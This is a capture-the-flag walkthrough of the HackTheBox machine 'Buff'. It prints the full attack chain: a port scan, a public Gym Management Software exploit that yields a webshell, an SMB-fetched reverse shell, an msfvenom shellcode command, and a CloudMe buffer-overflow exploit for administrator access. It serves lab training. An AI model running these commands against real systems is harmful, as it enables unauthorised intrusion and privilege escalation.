HTB Buff

1 minute read

Buff is a 20-point Windows Machine on HackTheBox, created by egotisticalSW. It involves 2 simple public exploits and forwarding a port.



As usual we start with a portscan:

nmap -Pn -sV -sC buff.htb
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

When we visit the site in a browser we can see a fitness site. On contact it shows:

mrb3n's Bro Hut
Made using Gym Management Software 1.0 

A quick google search shows this exploit, which gives us a shell as buff\shaun:

python http://buff.htb:8080/
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="

[+] Successfully connected to webshell.

To leave this really inconvinient shell, we use smb to pull in and start a xc shell:

nc -lvp 1337
\\\public\xc.exe 1337

Now we can read the user flag:

./xc -l -p 1337

		__  _____
		\ \/ / __|
		>  < (__
		/_/\_\___| by @xct_de
		           build: GLvLrMgcikmgHFyx
2020/11/21 11:13:53 Listening on :1337
2020/11/21 11:13:53 Waiting for connections...
2020/11/21 11:13:53 Connection from
2020/11/21 11:13:53 Stream established
[xc]:type \users\shaun\desktop\*


In Downloads we can find an usual binary:

cd \users\shaun 
C:\Users\shaun>dir Downloads
16/06/2020  15:26        17,830,824 CloudMe_1112.exe

A quick google search shows various public buffer overflow exploits for this exact version. Running netstat -ano shows that the service is listening on localhost on the port the exploits mention:

netstat -ano | findstr 8888
  TCP              LISTENING       8540

A quick side note: This was super unstable on release night and several people, including me, did not have this port even open.

I chose this exploit. We have to replace the shellcode though - an easy way to do it is via msfvenom:

msfvenom -f python -p windows/exec CMD='cmd.exe /c "\\\public\xc.exe 1338"'

After replacing the shellcode, we use xc to forward the port 8888 back to us:

!lfwd 8888 localhost 8888

We then run the exploit and get a shell back as administrator:

./xc -l -p 1338
type \users\administrator\desktop\*

This box had many stability issues and running public exploits does not teach much, so I did not really like it.